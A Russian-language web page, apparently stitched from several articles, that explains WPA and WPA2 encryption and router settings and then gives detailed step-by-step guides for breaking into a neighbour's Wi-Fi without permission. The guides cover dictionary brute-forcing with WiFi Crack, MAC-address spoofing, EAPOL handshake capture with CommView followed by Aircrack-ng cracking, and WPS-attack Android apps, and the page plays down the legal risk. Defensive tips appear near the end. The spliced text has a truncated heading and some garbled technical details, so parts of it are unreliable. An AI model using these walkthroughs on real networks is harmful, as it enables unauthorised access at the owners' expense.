Разное

Ключ wpa что это такое: (2019) WPA Шифрование Данных. Что Это Такое? [#РУКОВОДСТВО]

Содержание

(2019) WPA Шифрование Данных. Что Это Такое? [#РУКОВОДСТВО]

WPA шифрование подразумевает использование защищенной сети Wi-Fi. Вообще, WPA расшифровывается как Wi-Fi Protected Access, то есть защищенный доступ к Wi-Fi.

Большинство системных администраторов умеют настраивать этот протокол и знают о нем достаточно много.

Но и обычные люди могут узнать достаточно много о том, что же такое WPA, как его настроить и как использовать.

Правда, в интернете можно найти множество статей по этому поводу, из которых невозможно ничего понять. Поэтому сегодня мы будем говорить простым языком о сложных вещах.

Содержание:

Немного теории

Итак, WPA – это протокол, технология, программа, которая содержит в себе набор сертификатов, используемых при передаче сигнала Wi-Fi.

Если проще, эта технология позволяет использовать различные методы аутентификации для защиты Wi-Fi сети.

Это может быть электронный ключ, он же – специальное свидетельство о праве использования данной сети (дальше мы об этом поговорим).

В общем, при помощи этой программы использовать сеть смогут только те, кто имеет на это право и это все, что Вам нужно знать.

Для справки: Аутентификация – это средство защиты, которое позволяет установить подлинность лица и его право на доступ к сети, при помощи сопоставления сообщенных им и ожидаемых данных.

К примеру, человек может проходить аутентификацию, когда прикладывает свой палец к сканнеру отпечатка пальца. Если он просто вводит логин и пароль, это только авторизация.

Но отпечаток пальца позволяет проверить, действительно ли заходит этот человек, а не кто-то взял его данные и вошел с их помощью.

Рис. 1. Сканер отпечатка пальца на смартфоне

Так вот, в компьютерных сетях также используются определенные способы подтверждения того, что доступ к сети получает именно то устройство, которое имеет на это право.

В WPA есть собственный набор таких способов. О них мы поговорим далее, а перед этим уточним несколько важных моментов.

Что нужно знать о WPA?

  1. Данную технологию могут использовать не все устройства, а только те, которые поддерживают ее на программном уровне. То есть если производитель заложил в устройство функцию поддержки WPA, значит, его можно использовать.
  2. WPA является наследием WEP, другой технологии, в которой не было аутентификации как таковой.
  3. WPA использует специальные ключи, которые рассылаются всем устройствам, которые будут иметь право подключаться к сети. А дальше все просто:
  • сигнал попадает на новое устройство и запрашивает у него ключ;
  • если устройство дает ключ, то подключается к сети;
  • а если не дает, сигнал об этом отправляется на центральное устройство и подключение не происходит.

Если Вы когда-то работали с Cisco Pocket Tracer (симулятор построения сетей от этой фирмы), то принцип работы данной технологии Вы сможете понять, если посмотрите на рисунок 2.

Предупреждение! В принципе, если Вы никогда не работали с Cisco Pocket Tracer, не заморачивайтесь. И без этой схемы Вам все будет понятно.

Там есть LAP – прибор, который осуществляет удаленное управление и передает сигнал клиенту, то есть компьютеру, который использует сигнал Wi-Fi.

А также на схеме есть WLC – контроллер беспроводной локальной сети. Справа расположен сервер аутентификации.

Все это соединяет обычный Switch (устройство, которое просто соединяет различные сетевые устройства). С контроллера посылается ключ на сервер аутентификации, запоминается там.

Клиент при попытке подключиться к сети должен передать на LAP ключ, который он знает. Этот ключ попадает на сервер аутентификации и сравнивается с нужным ключом.

Если ключи совпадают, сигнал свободно распространяется к клиенту.

Рис. 2. Примерная схема WPA в Cisco Pocket Tracer

Вы не устали?

Тогда пойдем дальше.

к содержанию ↑

Составляющие WPA

Как мы говорили выше, WPA использует специальные ключи, которые генерируются при каждой попытке начать передачу сигнала, то есть включить Wi-Fi, а также меняются раз в некоторое время.

В WPA входит сразу несколько технологий, которые и помогают генерировать и передавать эти самые ключи.

Ниже, на рисунке, показана общая формула, в которую входят все составляющие рассматриваемой технологии.

Рис. 3. Формула с составляющими WPA

А теперь рассмотрим каждую из этих составляющих по отдельности:

  • 1X – это стандарт, который используется для генерирования того самого уникального ключа, с помощью которого в дальнейшем и происходит аутентификация.
  • EAP – это так называемый расширяемый протокол аутентификации. Он отвечает за формат сообщений, с помощью которых передаются ключи.
  • TKIP – протокол, который позволил расширить размер ключа до 128 байт (раньше, в WEP, он был лишь 40 байт).
  • MIC – механизм проверки сообщений (в частности, они проверяются на предмет целостности). Если сообщения не отвечают критериям, они отправляются обратно.

Стоит сказать, что сейчас уже есть WPA2, в котором, кроме всего вышесказанного, используются также CCMP и шифрование AES.

Мы не будем сейчас говорить о том, что это такое, но WPA2 надежнее, чем WPA. Это все, что Вам точно нужно знать.

Еще раз с самого начала

Итак, у Вас есть Wi-Fi. В сети используется технология WPA.

Чтобы подключиться к Wi-Fi, каждое устройство должно предоставить сертификат пользователя, а если проще, то специальный ключ, выданный сервером аутентификации.

Только тогда он сможет использовать сеть. Вот и все!

Теперь Вы знаете, что же такое WPA. Теперь поговорим о том, чем хороша и чем плоха эта технология.

к содержанию ↑

Преимущества и недостатки WPA шифрования

К преимуществам данной технологии стоило бы отнести следующее:

  1. Усиленная безопасность передачи данных (в сравнении с WEP, предшественником, WPA).
  2. Более жесткий контроль доступа к Wi-Fi.
  3. Совместимость с большим количеством устройств, которые используются для организации беспроводной сети.
  4. Централизованное управление безопасностью. Центром в этом случае является сервер аутентификации. За счет этого злоумышленники не имеют возможности получить доступ к скрытым данным.
  5. Предприятия могут использовать собственные политики безопасности.
  6. Простота в настройке и дальнейшем использовании.

Конечно же, есть у данной технологии и недостатки, причем они зачастую оказываются весьма значительными. В частности, речь идет вот о чем:

  1. Ключ TKIP можно взломать максимум за 15 минут. Об этом заявила группа специалистов в 2008 году на конференции PacSec.
  2. В 2009 году специалистами из Университета Хиросимы был разработан метод взлома любой сети, где используется WPA, за одну минуту.
  3. С помощью уязвимости, названной специалистами Hole196, можно использовать WPA2 со своим ключом, а не с тем, который требуется сервером аутентификации.
  4. В большинстве случаев любое WPA можно взломать с помощью обычного перебора всех возможных вариантов (брут-форс), а также при помощи так называемой атаки по словарю. Во втором случае используются варианты не в хаотическом порядке, а по словарю.

Конечно, чтобы воспользоваться всеми этими уязвимостями и проблемами, необходимо иметь особенные знания в области построения компьютерных сетей.

Большинству рядовых пользователей все это недоступно. Поэтому Вы можете особо не переживать о том, что кто-то получит доступ к Вашему Wi-Fi.

Рис. 4. Взломщик и компьютер

к содержанию ↑

О настройке WPA шифрования

Для пользователя настройка выглядит очень просто – он выбирает технологию WPA для шифрования пароля, с помощью которого он будет подключаться к сети.

Точнее, он использует WPA-PSK, то есть WPA не с ключом, а с паролем. Для этого он заходит в настройки роутера, находит там тип сетевой аутентификации и задает пароль.

Если более подробно, эта процедура выполняется следующим образом:

  1. Чтобы зайти в настройки роутера, в своем браузере, в адресную строку введите 192.168.0.1 или же 192.168.1.1. Если Вы ничего не меняли в этом окне, то логин и пароль будут одинаковыми – «admin» и «admin».
  2. Дальше найдите пункт, касающийся метода аутентификации. К примеру, если используется Asus RT-N12, этот пункт находится в разделе «Advanced Settings» и в подразделе «Wireless» (это в меню слева). WPA выбирается возле надписи «Authentication Method».
  3. А также важными параметрами указываются «WPA Pre-Shared Key», то есть пароль для подключения к сети и «SSID», то есть название сети.

Рис. 5. Окно настройки роутера

Как можно заметить на рисунке 5, там есть также поле «WPA Encryption». Обычно эти два параметра (и «Authentication Method») указываются вместе.

Под параметром «Encryption» подразумевается тип шифрования. Существует всего два типа, которые используются вместе с WPA – TKIP и AES.

А также используются комбинации этих двух типов.

Что касается выбора типа шифрования, то вот Вам инструкции по этой теме:

  1. Если Вам действительно важна защищенность Вашей сети, используйте AES. При этом не применяйте никакие комбинации с TKIP.
  2. Если Вы используете устаревшие устройства, которые не поддерживают WPA2, лучше использовать TKIP.
  3. Для домашней сети вполне подойдет и TKIP. Это создаст меньшую нагрузку на сеть, но и снизит ее защищенность.

Никаких других советов в этом случае быть не может. У TKIP безопасность слабее и этим все сказано.

Собственно, это все, что можно сказать о WPA шифровании.

Выше мы говорили о том, что у данной технологии есть достаточно много уязвимостей. Ниже Вы можете видеть, как они используются для взлома сети.

 

 

ⓘ WPA и WPA2 — обновлённая программа сертификации устройств бе

                                     

3. Шифрование

Даже не принимая во внимание тот факт, что WEP, предшественник WPA, не обладает какими-либо механизмами аутентификации пользователей как таковыми, его ненадёжность состоит, прежде всего, в криптографической слабости алгоритма шифрования. Ключевая проблема WEP заключается в использовании слишком похожих ключей для различных пакетов данных.

TKIP, MIC и 802.1X части уравнения WPA усилили шифрование передаваемых данных в сетях, использующих WPA.

TKIP отвечает за увеличение размера ключа с 40 до 128 бит, а также за замену одного статического ключа WEP ключами, которые автоматически генерируются и рассылаются сервером аутентификации. Кроме того, в TKIP используется специальная иерархия ключей и методология управления ключами, которая убирает излишнюю предсказуемость, которая использовалась для несанкционированного снятия защиты WEP ключей.

Сервер аутентификации после получения сертификата от пользователя использует 802.1X для генерации уникального базового ключа для сеанса связи. TKIP осуществляет передачу сгенерированного ключа пользователю и точке доступа, после чего выстраивает иерархию ключей плюс систему управления. Для этого используется двусторонний ключ для динамической генерации ключей шифрования данных, которые в свою очередь используются для шифрования каждого пакета данных. Подобная иерархия ключей TKIP заменяет один ключ WEP статический на 500 миллиардов возможных ключей, которые будут использованы для шифрования данного пакета данных.

Другим важным механизмом является проверка целостности сообщений Message Integrity Check, MIC. Её используют для предотвращения перехвата пакетов данных, содержание которых может быть изменено, а модифицированный пакет вновь передан по сети. MIC построена на основе мощной математической функции, которая применяется на стороне отправителя и получателя, после чего сравнивается результат. Если проверка показывает на несовпадение результатов вычислений, данные считаются ложными и пакет отбрасывается.

При этом механизмы шифрования, которые используются для WPA и WPA-PSK, идентичны. Единственное отличие WPA-PSK состоит в том, что аутентификация производится с использованием пароля, а не по сертификату пользователя.

Как сменить тип шифрования беспроводной сети и пароль на роутере

Методы шифрования WEP или WPA/TKIP уже являются устаревшими. Они не настолько надежны, как WPA2 и могут существенно снижать скорость передачи по беспроводной сети вашего роутера. Рекомендуется устанавливать метод шифрования WPA2 с алгоритмом AES (стандарт безопасности IEEE 802.11i).

Сделаем это на примере роутера  TL-WR840N.

Вводим в адресной строке роутера ip адрес 192.168.0.1 и входим в страницу настроек роутера. Логин и пароль по умолчанию admin и admin.

Нажмите на панеле слева Беспроводной режим > Защита беспроводного режима. Откроется окно с выбором шифрования и паролем как на изображении.

Выберите Версию WPA2-PSK, Шифрование AES и установите ваш пароль.
Не забудьте ниже нажать кнопку Сохранить.

Изменение пароля и метода шифрования для ASUS

Заходим в настройки роутера, введя в адресную строку браузера 192.168.1.1. Логин и пароль по умолчанию так же admin и admin

Нажимаем на панели управления слева Беспроводная сеть, устанавливаем Метод проверки подлинности: WPA2-Personal, Шифрование WPA: AES и устанавливаем пароль, который вы желаете.

Так же не забудьте нажать на кнопку Применить.

Изменение пароля и метода шифрования для Keenetic

Введите в адресной строке браузера адрес интернет-центра my.keenetic.net или предустановленный по умолчанию адрес 192.168.1.1 
Логин и пароль по умолчанию admin и admin.

Нажмите внизу на иконку Wi-Fi, откроется меню настроек беспроводной сети. Выберите Защита сети: WPA2-PSK, Ключ сети — ваш пароль.

Так же не забудьте нажать кнопку Применить.

Как узнать пароль от WiFi соседа

Очень многие оказывались в ситуации, необходим Wi-Fi и смартфон или ноутбук ловит множество сетей с хорошим сигналом, но на каждой сети стоит пароль. Конечно, можно говорить о том, что подключаться к чужой сети против воли владельца – это некрасиво. Но что делать, если подключение к интернету – это вопрос жизни и смерти? Для таких случаев существует несколько рабочих вариантов для обхода защиты:

  • брутфорс;
  • изменение mac-адреса;
  • программы для взлома;
  • андроид приложения;
  • перехват трафика.

Как узнать пароль от WiFi соседа

Брутфорс

Брутфорс – это банальный подбор всех возможных комбинаций символов, из которых может состоять пароль. Это, пожалуй, самый простой способ, который только можно придумать, поскольку тут не нужны особенные знания или сложное программное обеспечение. Но, с другой стороны, сложность способа заключается в том, что это достаточно муторно и процесс может занять очень много времени, если хозяин установил достаточно сложный пароль.

Подбираем пароль из всех возможных комбинаций символов, которые он может содержать

  1. Для начала попробуйте самые распространенные пароли. Банальные 12345678 и qwertyui устанавливаются достаточном большим количеством пользователей и вполне вероятно, что у вашего соседа установлен один из таких. Также можете подумать, какой пароль установили бы сами. А если вы хорошо знакомы с хозяином роутера, можно попробовать дату его рождения или какую-либо другую значимую для него комбинацию символов.

    Список часто используемых паролей

    Заметка! Существует 30 различных паролей, которые чаще всего используются пользователями, их легко можно найти в интернете. Попробуйте все из них, прежде чем переходить к следующему этапу.

  2. Если не один из самых простых и вероятных паролей не подошел, придется последовательно подбирать различные комбинации символов. Конечно, можно делать это все вручную, но страшно представить, сколько на это уйдет времени. Кроме того, пока вы вручную переберете хотя бы десятую часть возможных вариантов, никуда подключаться уже не захочется.

Автоматический подбор комбинаций

Не обязательно проводить эту операцию вручную. Есть достаточно много программ, которые автоматически последовательно подбирают комбинации. Это гораздо быстрее и проще для пользователя. Но стоит иметь в виду, что поиск подходящей комбинации может занять достаточно долгое время, даже если использовать специальное программное обеспечение. Простой пароль вроде qwertyui можно взломать меньше чем за минуту, а вот на расшифровку /#7&//.’ уйдет очень много времени.

Для автоматического подбора паролей от Wi-Fi используем программу WiFi Crack

WiFi Crack

Одна из программ для автоматического подбора паролей — WiFi Crack. Пользоваться ей очень легко.

  1. Скачиваем программу с любого сайта, распространяющего подобный софт.
  2. Запускаем файл и видим перед собой простой интерфейс.

    Интерфейс программы WiFi Crack.jpg

  3. Вверху в строке «Refresh» выбираем сеть, которую необходимо взломать и активируем программу нажатием кнопки «Scan for Access points».

    В строке «Refresh» выбираем сеть, нажимаем кнопку «Scan for Access points»

  4. Ожидаем завершения процесса сканирования сетей, щелкаем по активной кнопке, в нашем случае «Wi-Fi WPA», со списком найденных сетей.

    Нажимаем кнопку «Wi-Fi WPA»

  5. В разделе «Select Target Access Point» щелкаем по нужной сети.

    Щелкаем по нужной сети левой кнопкой мышки в разделе «Select Target Access Point»

  6. В нижней части окна кликаем по кнопке «Browse», что бы выбрать файл со словарем возможных паролей.

    Щелкаем по кнопке «Browse»

    Открываем папку с файлом, щелкаем по нему левой кнопкой мышки, нажимаем «Open»

    Заметка! Скорее всего, программа потребует подключить словарь, которым она будет пользоваться для подбора паролей. Обычно, словари идут в комплекте с программой.

  7. Настроив параметры, нажимаем кнопку «Wi-Fi Attack» и ждем завершения процесса.

    Щелкаем по кнопке «Wi-Fi Attack»

  8. Конечным результатом работы программы станет надпись с паролем под строчкой «Finished» в самом низу окна.

    Под строчкой «Finished» находим пароль от выбранной сети

  9. Возвращаемся в интерфейс программы и щелкаем по кнопке «Key Database».

    В главном окне программы щелкаем по кнопке «Key Database»

  10. В открытом окне вы увидите информацию по подключению, включая пароль от Wi-Fi.

    Изучаем информацию по выбранному подключению, в поле «Key» находится пароль

Заметка! В среднем, взлом пароля программой происходит за 30-90 минут. Так как пользователи достаточно редко устанавливают действительно сложные пароли, большинство можно взломать за полчаса. Но существуют и такие пароли, на взлом которых может уйти не один год. Так что не каждую сеть получится взломать.

Изменение Mac-адреса

Не всегда в качестве защиты для Wi-Fi используются пароли. Достаточно часто пользователи используют фильтр по mac-адресам. С устройства эта сеть будет обнаружена как открытая и не требующая пароля. Но подключение к ней не получится, так как наш mac-адрес не проходит фильтрацию. Так что, единственный выход – это сменить mac-адрес устройства на подходящий. Но как это сделать?

Заметка!  Mac-адрес – это специальный распознавательный параметр, который имеется у каждого устройства, расположенного в одной сети. Для одного роутера разрешен ряд определенных mac-адресов, которые, как правило, принадлежат устройствам пользователя, который устанавливал Wi-Fi.

При помощи специального ПО можно установить, какие именно mac-адреса корректны при подключении. Эти данные получаются на основе передаваемых ими пакетов данных. Одна из таких программ — MAC Address Scanner. Она очень проста в использовании. Достаточно ее запустить и она выяснит адреса всех доступных сетей. То есть, способ взлома в чем-то похож на первый из тех, которые мы уже рассмотрели выше.

MAC Address Scanner

  1. Из надежного источника скачиваем программу и устанавливаем на компьютер.

    Переходим на надежный сайт и скачиваем программу MAC Address Scanner

  2. Запускаем утилиту и щелкаем по кнопке «Start Scan».

    Нажимаем на кнопку «Start Scan»

  3. Ожидаем завершения процесса, щелкаем «ОК».

    Ждем завершения процесса сканирования, нажимаем «ОК»

  4. Щелкаем по кнопке «Report».

    Щелкаем по кнопке «Report»

  5. Выбираем место для хранения файла, нажимаем по кнопке «Save».

    Кликаем по кнопке «Save»

    Открываем файл с Мак-адресами и выбираем подходящий

Смена Mac-адреса на устройстве

Осталось только сменить mac-адрес на своем устройстве. С компьютера или ноутбука провернуть такую операцию не составит труда.

  1. Зайдите в «Панель управления».

    Открываем меню «Пуск», затем дважды щелкаем по пункту «Панель управления»

  2. Через нее нужно будет перейти в раздел настройки сетей интернета.

    В режиме «Просмотр» выставляем «Категория», щелкаем по ссылке «Просмотр состояния сети и задач»

  3. В меню слева щелкните по второй ссылке.

    Щелкаем по ссылке «Изменение параметров адаптера»

  4. Найдите то самое подключение, в котором нужно сменить адрес.

    Правой кнопкой мышки щелкаем по ярлыку нужного подключения

  5. Откройте его свойства, а оттуда уже перейдите в настройки.

    Щелкаем левой кнопкой мышки по пункту «Свойства»

    Нажимаем на кнопку «Настроить»

  6. В открывшемся окне перейдите во вкладку с дополнительными параметрами.

    Переходим во вкладку «Дополнительно»

  7. Там нужно поменять сетевой адрес на тот, который вычислила программа.

    В списке «Свойство» щелкаем по параметру «Сетевой адрес», вводим Мак-адрес в поле «Значение», нажимаем «ОК»

  8. После этого, подключение необходимо перезагрузить для корректной работы.

Таким образом, вы настроите себе тот mac-адрес, который роутер идентифицирует как разрешенный, и сможете без проблем подключаться через него к чужому Wi-Fi.

Программы для взлома

Почти всегда, при взломе Wi-Fi возникает необходимость установки и использования дополнительного программного обеспечения. Рассмотрим три самых популярных программы:

  • CommView;
  • Aircrack-ng;
  • MAC Address Scanner.

Достаточно универсальная программа для перехвата пакетов данных – CommView. Это не сама простая программа, но с ней процесс пойдет несколько легче. Для начала разберемся, какие бывают типы шифрования и пакетов данных.

На данный момент в абсолютном большинстве Wi-Fi роутер используется один из двух типов шифрования:

  1. WEP – это устаревший тип шифрования, который, тем не менее, на данный момент еще используется в некоторых сетях, хоть и очень редко. Это довольно простой тип шифрования, в котором используются пароли либо из пяти, либо из тринадцати знаков. Программа CommView может взломать его даже без словаря. На это уйдет совсем немного времени – от минуты до часу.

    Использование шифрования типа WEP

  2. WPA – это новый и более совершенный тип шифрования. На данный момент он используется практически везде. У данного типа шифрования имеется множество разновидностей, но сейчас это не важно, поскольку взламываются все типы одним и тем же способом. Тут уже используются более надежные пароли. Отчасти, более надежными они стали из-за увеличения числа вариантов для количества символов: от восьми до шестидесяти трех. Чтобы взломать такой пароль, CommView использует словарь, а время на взлом варьируется от одной минуты до восьми лет. Чем сложнее пароль, тем больше времени потребуется на его взлом.

    Новые и более надежные типы шифрования WPA

Что касается пакетов данных, есть 3 типа:

  1. DATA – это данные, которые в народе принято называть «контент». То есть, это все то, что идет из интернета и отображается на устройстве.
  2. EPOL – это те самые пакеты данных, которые содержат информацию о пароле роутера. Именно эти пакеты данных нас и интересуют. С остальных вы в данном случае никакой полезной информации не вытянете.
  3. CTRL – это пакеты в которых хранятся технические данные о сети. Здесь содержится только информация о настройках, которые получило текущее подключение и прочее.

Перехват пакета данных с помощью программы CommView

Заметка! Чтобы взломать Wi-Fi, необходимо, чтобы хотя бы одно устройство было к нему подключено.

  1. Скачиваем программу на официальном сайте.

    Переходим на официальный сайт CommView и нажимаем «Скачать»

  2. Установить ее не составит труда, просто запустите файл и следуйте инструкции установщика.

    Двойным щелчком левой кнопкой мышки открываем установочный файл «setup.exe»

    Нажимаем «Next» и следуем инструкции установщика

  3. Запускаем программу. Сначала нас интересует вкладка, которая носит название «Узлы». Справа появляется особое меню, в котором нужно установить двухсекундный интервал на режим сканирования. После того как установили цифру «2», нажимаем на плей.

    Во вкладке «Узлы» ставим галочку на пункт «Режим сканирования», выставляем интервал 2 сек., нажимаем кнопку «Запуск»

  4. Обратите внимание на колонку SSID. Там прописаны названия сетей. А вот в колонке «Канал» мы видим радиоканалы, на которых доступные сети работают. Теперь нужно переключиться на одноканальный режим сканирования и выбрать тот радиоканал, на котором работает сеть, которую нужно взломать.

    В колонке SSID видим название сетей, в колонке «Канал» мы видим радиоканалы

    Ставим галочку на пункт «Одноканальный режим» и выбираем тот радиоканал, на котором работает сеть

  5. Под сетью можно обнаружить ответвление со строчками, напротив которых изображены телефоны. Это устройства, которые подключены к сети.

    Под названием сети можно увидеть мобильные устройства подключенные к ней

  6. Открываем вкладку «Пакеты» и видим, что устройства обмениваются с роутером большим количеством пакетов данных. Во время работы это все DATA файлы, а нам нужны EPOL, которые появляются только во время подключения устройства.

    Щелкаем по кнопке «Пакеты»

    В открытом окне мы увидим все DATA файлы, а нам нужны EPOL

  7. Теперь главное выловить момент, когда пойдут пакеты данных EPOL. Когда они появились в нашем списке, все пакеты нужно выделить и открыть в новом окне. Для этого есть специальная иконку в левом нижнем углу программы.

    Выделяем пакеты EPOL, щелкнув по ним левой кнопкой мышки, открываем их в новом окне, нажав на соответствующую кнопку в левой нижнем углу

  8. В новом окне экспортируем файлы и сохраняем в формате «Wireshark/TcpDump».

    Открываем вкладку «Файл»

    Подводим курсор мышки к пункту «Экспорт log-файлов», в раскрытом меню

Использование программы Aircrack-ng

Для проведения дальнейших процедур, нам потребуется программа Aircrack-ng.

  1. Открываем программу и указываем путь к сохраненному файлу при помощи CommView файлам.

    Нажимаем на кнопку «Choose» и открываем сохраненный ранее файл с пакетами

  2. Также выбираем тип шифрования и указываем путь к словарю, при помощи которого будет подбираться пароль.

    Ставим галочку на нужный тип шифрования, нажимаем на кнопку «Choose» открываем словарь при помощи которого будет подбираться пароль

  3. Чуть ниже есть три пункта, каждый из которых нужно отметить галочкой.

    Отмечаем галочками все пункты, как на скриншоте

  4. В две активированные строчки вводим имя сети, а также mac-адрес, который также отображается в программе CommView. Жмем на кнопку «Launch».

    В поля вводим имя сети, а также Mac-адрес, которые можно посмотреть в программе CommView, жмем на кнопку «Launch»

  5. Если все сделано правильно и в соответствии с инструкцией, начнется взлом. Это займет некоторое время. По завершению процесса, перед вами откроется окно, в котором будет прописан пароль от сети.

    По завершению процесса в открытом окне мы увидим пароль от сети

Заметка! Даже используя программное обеспечение, процедура достаточно сложная. Так что с первого раза может не получиться.

Андроид приложения

Хоть защита паролей и совершенствуется, методы взлома совершенствуются еще быстрее. И сейчас существует масса приложений для Андроид, которые позволяют взломать чужой Wi-Fi. Вот самые популярные из них:

  • WPS Connect;
  • WIFI TESTER;
  • WiFi You.

WPS Connect

WPS Connect – очень хитрое приложение, поскольку с ним вы получаете возможность не только подключаться к сети, обходя пароль, но и отключать от нее других. Но, к сожалению, оно обходит только защиту WPS. Рассмотрим принцип его работы:

  1. Скачиваем утилиту с Плей маркета.

    В Плей маркете находим приложение, скачиваем и нажимаем «Открыть»

  2. Жмем на обновление.

    Нажимаем на значок обновления

  3. В программу будут загружены все сети, доступные вашему телефону. Выберите одну из них и попробуйте доступные пароли.

    Щелкаем по нужной сети

    Ставим галочку на один из вариантов паролей, нажимаем кнопку «Try»

  4. Найдя нужный пароль, вы просто подключитесь к сети.

    Процесс подключения

    Если будет надпись «Connected», подключение удалось, нажимаем «Закрыть»

На заметку! Обладатели Root-прав, даже смогут увидеть пароль.

WIFI TESTER – более широкое приложение, потому что обходит уже и WPA защиту. Принцип работы основывается на обнаружении уязвимых мест.

WiFi You – приложение, имеющее несколько более интересный принцип работы. Оно не взламывает, а лишь собирает и запоминает пароли от сетей, в зону действия которых попал телефон.

Видео — Как взломать Wi Fi на Андроид с помощью WPS Connect

Перехват трафика

Это, пожалуй, самый надежный, но вместе с тем и довольно-таки тяжелый способ. Чтобы им воспользоваться, нужно не просто иметь представление о беспроводной сети, но и понимать принцип работы роутера и шифрования паролей.

Изначально сигнал интернета передается по кабелю. Кабель, передающий сигнал подключается к роутеру. А уже роутер распространяет сигнал «по воздуху». Пароль устанавливается в самом роутере и когда мы вводим его со своего устройства, сигнал с паролем передается в маршрутизатор. От роутера поступает ответ с установленным паролем и если пароль введен верно, происходит подключение. Если же нет, подключения не происходит.

Схема перехвата трафика

Так или иначе, а роутер дал нам ответ с установленным на нем паролем. После подключения, он обменивается со всеми подключенными устройствами информацией. Ее называют пакетами данных. При желании и достаточно компьютерной грамотности, эти пакеты данных можно перехватить и, расшифровав их, получить пароль, который был установлен на роутере.

Но как уже говорилось ранее, способ этот достаточно сложный, ведь чтобы его реализовать потребуется высокий уровень знаний в сфере компьютерной техники. Но можно и просто воспользоваться специальной программой CommView, инструкция к которой была описана выше.

Риск использования чужого Wi-Fi

Многие боятся использовать постороннюю сеть из-за риска перехвата личных данных другим пользователем. Например, часто можно услышать о том, что таким образом хозяин сети может узнать пароли пользователя, подключенного к ней.

Но тут возникает вопрос: вы ведь не боитесь использовать открытый Wi-Fi, например, в кафе? Хотя там риск гораздо выше, ведь количество подключенных пользователей зашкаливает.

Чем небезопасно использование чужого Wi-Fi

Ни в том, ни в другом случае, никто не сможет получить доступ к вашим данным. Причем не потребуются даже дополнительные средства защиты. Обо всем этом уже позаботились разработчики операционных систем. В Windows в стандартном наборе программ установлены настройки, призванные защитить данные пользователя. Этих настроек уж точно хватит на то, чтобы вашими данными не смог воспользоваться другой человек, подключенный к одной сети с вами. Даже если это хозяин роутера.

Главное, когда происходит подключение к новой сети, честно давайте ответы на все вопросы, которые поставит перед вами система. Тогда вы доверитесь в ее надежные руки и сможете ничего не бояться.

Юридические последствия

С относительно недавних пор кража интернета стала уголовным преступлением и может наказываться сроком до пяти лет. Но на деле, вряд ли вам светит реальное наказание только за то, что вы подключались к чужому роутеру. Действительно серьезным преступлением это посчитают только в том случае, если вы использовали подключение для получения персональных данных пользователя.

Последствия использования чужого интернета

Кроме того, согласитесь, вряд ли в нашей стране дело о похищении трафика дойдет до суда. С соседом всегда можно договориться и извиниться, не говоря уже о том, что вас будет достаточно трудно вычислить. А уж если использовать закрытые сети, встречающиеся на улице, то это вообще почти нереально.

Но, все-таки, не рекомендуется использовать чужой Wi-Fi без острой необходимости и на протяжении длительного времени. Ведь это материальные потери для владельца сети, что становится уже серьезным поводом для судебного разбирательства.

Как не дать взломать свою сеть

Есть несколько очень простых советов, которые позволят вам защитить свой Wi-Fi так, что его практически никто не сможет взломать. Ведь все предыдущие методы были рассчитаны на пользователей, которые плохо думают о защите своего интернета.

Способы защиты своей сети от взлома

Чтобы создать надежное подключение исключительно для своих устройств, выполните три простых шага:

  1. Измените пароль. Да, это очень очевидный совет, но, как показывает практика, многие пользователи часто не только не хотят придумывать более сложный пароль, но и просто оставляются на роутере заводские настройки. Это крайне опасно, поскольку такой пароль очень легко подобрать, а пользователь, подключившийся к вашей сети, сможет не только пользоваться ей, но и самостоятельно поменять пароль, отрезав вас от своего же Wi-Fi.

    Меняем пароль на более сложный, который тяжело подобрать и взломать

  2. Установите шифрование WPA2. Это самый надежный из существующих на данный момент типов шифрования. , практически никто не сможет взломать ваш Wi-Fi.

    Устанавливаем шифрование WPA2

  3. Отключите WPS. Это функция, которая практически приглашает посторонних взломать ваш Wi-Fi. Ее работа заключается в том, чтобы запоминать подключенные устройства. На деле, взломщикам ничего не стоит выдать свой гаджет за тот, который WPS запомнила ранее.

    Для защиты соединения сети отключаем WPS

Читайте, подробную информацию с инструкцией, в нашей новой статье — «Как на Wi-Fi установить пароль».

Если вы выполнили эти три шага, подключение к вашей сети без пароля становится невозможным. Точнее, подключиться то можно, но на это уйдет столько времени и энергии, что любой взломщик очень быстро поймет, что игра не стоит свеч.

Существует достаточно много способов взломать чужой Wi-Fi. Но все они ориентированы на пользователей, которые не позаботились о безопасности подключения.

Видео — Как взломать Wi-Fi пароль соседа за 5 минут

Что такое ключ WPA? (с рисунками)

Ключ WPA является частью схемы защищенного доступа Wi-Fi для обеспечения безопасности беспроводного Интернета. WPA и его преемник WPA2 используют предварительно разделенные ключи для обеспечения очень надежного шифрования для беспроводной передачи данных. Эти ключи используются для взаимной аутентификации обмена данными между беспроводными устройствами, обычно с использованием модели «концентратор и луч», которая отправляет сообщения от многих устройств через маршрутизатор беспроводной сети, который затем связывается с Интернетом с помощью проводного соединения.Модифицированная версия этих протоколов безопасности использует централизованный сервер для обработки аутентификации пользователей вместо того, чтобы полагаться на ключ WPA, который был предоставлен всем авторизованным пользователям.

Ключ WPA можно использовать для защиты беспроводной сети.

Беспроводные сети широко распространены в современном мире.Многие из них работают как незащищенные сети и очень уязвимы для атак хакеров. Они практически не обеспечивают защиты данных, передаваемых на компьютеры и с компьютеров. Некоторая безопасность может быть обеспечена за счет динамического обмена ключами безопасности между компьютером или другим мобильным устройством и сервером, но это по-прежнему оставляет базовое соединение для передачи данных уязвимым для перехвата.

Отели могут использовать ключ WPA, чтобы только гости могли получить доступ к сети.Системы безопасности беспроводной сети

WPA и WPA2 устраняют эту уязвимость. В большинстве небольших сетей ключ WPA лежит в основе этой защиты. Этот ключ используется всеми устройствами, которые должны иметь доступ к сети. В идеале это совместное использование осуществляется в автономном режиме, чтобы передача самого ключа не была уязвима для перехвата.

Ключ WPA состоит из 256-битной строки данных. Он может быть сгенерирован непосредственно пользователем и передан в виде шестнадцатеричного ключа длиной 64 цифры. Однако это несколько громоздкий метод совместного использования ключа шифрования, который не поддается легкому запоминанию пользователями.Второй вариант совместного использования ключей WPA включает использование парольной фразы и функции получения ключа.

Парольные фразы состоят из строк длиной до 63 символов ASCII. Числовые значения, связанные с этими символами, затем объединяются с именем сети, известным как идентификатор набора услуг (SSID), и проходят через множество итераций функции деривации.Полученные 64 шестнадцатеричных цифры затем используются в качестве ключа WPA.

Ключ, сгенерированный из ключевой фразы и SSID, потенциально более уязвим, чем действительно случайный 64-значный ключ. Длинная кодовая фраза в сочетании с необычным SSID дает ключ, защищенный от взлома методом грубой силы. Короткая или общая фраза-пароль, такая как «пароль», в сочетании с общим SSID, например «сеть» или название маршрутизатора определенной марки, даст бесполезный ключ.Хакеры уже вычислили ключи, сгенерированные из наиболее распространенных комбинаций, и попытаются их использовать в начале любой атаки методом грубой силы.

